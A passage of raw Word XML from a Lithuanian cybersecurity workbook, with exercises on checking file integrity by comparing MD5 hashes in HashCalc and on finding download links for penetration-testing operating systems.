          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidR="004D3439" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>aip</w:t>
      </w:r>
      <w:r w:rsidR="00733CDE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> jūs</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004D3439" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>galite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>apsaugot</w:t>
      </w:r>
      <w:r w:rsidR="004D3439" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> savo paskyrą ir duomenis?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01671413" w14:textId="77777777" w:rsidR="00E4690F" w:rsidRPr="005A5C28" w:rsidRDefault="00E4690F" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F5230FF" w14:textId="7684641F" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="4A203957"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8</w:t>
      </w:r>
      <w:r w:rsidR="00605244" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis</w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">DUOMENŲ PALYGINIMAS SU MAIŠOS SEKA (ANGL. </w:t>
      </w:r>
      <w:r w:rsidR="006C178B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>HASH)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C2DC2F" w14:textId="74C0F383" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="00733CDE" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Yra s</w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">varbu suprasti, kada duomenys buvo sugadinti ir </w:t>
      </w:r>
      <w:r w:rsidR="006C178B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">/ </w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ar sugadinti</w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. Maišos algoritmas gali būti naudojamas patikrinti</w:t>
      </w:r>
      <w:r w:rsidR="004D3439" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ar duomenys pasikeitė, ar jie išliko tokie patys. Maišymo algortimas atlieka maišos funkciją informacijai arba atskiram failui. Yra daug įvairių maišos algoritmų</w:t>
      </w:r>
      <w:r w:rsidR="004D3439" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>kai kurie</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004D3439" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">iš jų </w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>labai paprasti, o kiti labai sudėtingi. Kai tiems patiems duomenims naudojama tas pats maišos algoritmas, grąžinama vertė visada yra ta pati. Jei atliekami kokie nors duomenų pakeitimai, grąžinama maišos vertė skirsis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C496E0" w14:textId="29A73DA0"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Atlikite tokius veiksmus:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45809990" w14:textId="15A1F07E" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sukurkite tekstinį dokumentą su pasirinktu turiniu ir jį išsaugokite vardu hash.txt</w:t>
      </w:r>
      <w:r w:rsidR="00CC71C0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F7DBFD" w14:textId="0093BE5C" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Suraskite internete maišos algoritmo skaičiuoklę, parsisiųskite ir įdiekite (rekomendacija: paieškai naudo</w:t>
      </w:r>
      <w:r w:rsidR="00733CDE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">frazę </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>HashCalc</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00CC71C0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AF6CC3" w14:textId="02027C5E" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Naudodami įdiegtą programinę įrangą parinkite algoritmą MD5 ir išsaugotam failui suskaičiuokite maišos eilę (angl. </w:t>
      </w:r>
      <w:r w:rsidR="00AC5939" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- hash</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>). Rezultatą išsisaugokite</w:t>
      </w:r>
      <w:r w:rsidR="00AC5939" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45128902" w14:textId="5D79D2AD" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Dokumente hash.txt redaguokite turinį ir išsaugokite palikdami pakitimus</w:t>
      </w:r>
      <w:r w:rsidR="00AC5939" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD2DE48" w14:textId="25940C6B" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Dar kartą suskaičiuokite maišos eilę dokumentui hash.txt</w:t>
      </w:r>
      <w:r w:rsidR="00AC5939" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B27560B" w14:textId="7D0A034A" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Palyginkite abie</w:t>
      </w:r>
      <w:r w:rsidR="00733CDE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>jų</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> atvej</w:t>
      </w:r>
      <w:r w:rsidR="00733CDE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ų</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gautą maišos eilę</w:t>
      </w:r>
      <w:r w:rsidR="00AC5939" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D62D5CE" w14:textId="0D2EBB6D" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kodėl maišos eilės skiriasi?</w:t>
      </w:r>
      <w:r w:rsidR="00733CDE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Glaustai pakomentuokite ir surašykite atsakymus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF0AEC9" w14:textId="77777777" w:rsidR="00576B92" w:rsidRPr="005A5C28" w:rsidRDefault="00576B92" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BD5F5FC" w14:textId="7BA11D5F" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF3C757" w14:textId="6AD10B41" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="1D9A2855" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>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SlavaSoft Downloads. </w:t>
      </w:r>
      <w:r w:rsidR="3260D660" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">SlavaSoft. </w:t>
      </w:r>
      <w:r w:rsidR="2C02C5C4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId106">
        <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>http://www.slavasoft.com/download.htm</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="325D4215" w14:textId="325173FE" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="00AB1DA7" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AC57919" w14:textId="1925E370" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="42890CD5"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9</w:t>
      </w:r>
      <w:r w:rsidR="00605244" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis</w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">PATEIKITE TIESIOGINES NUORODAS, </w:t>
      </w:r>
      <w:r w:rsidR="00733CDE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>PER KURIAS</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>GALIMA PARSISIŲSTI DVI SKIRTINGAS ATSPARUMO TESTAVIMUI SKIRTAS OPERACINES SISTEMAS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B71D96" w14:textId="79DBA44C" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="00AB1DA7" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02779FBE" w14:textId="399EECB2" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F981F42" w14:textId="4E2A0DCB" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="26C47330" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Reddy</w:t>
      </w:r>
      <w:r w:rsidR="001E2CAC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>P. (</w:t>
      </w:r>
      <w:r w:rsidR="311571AE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
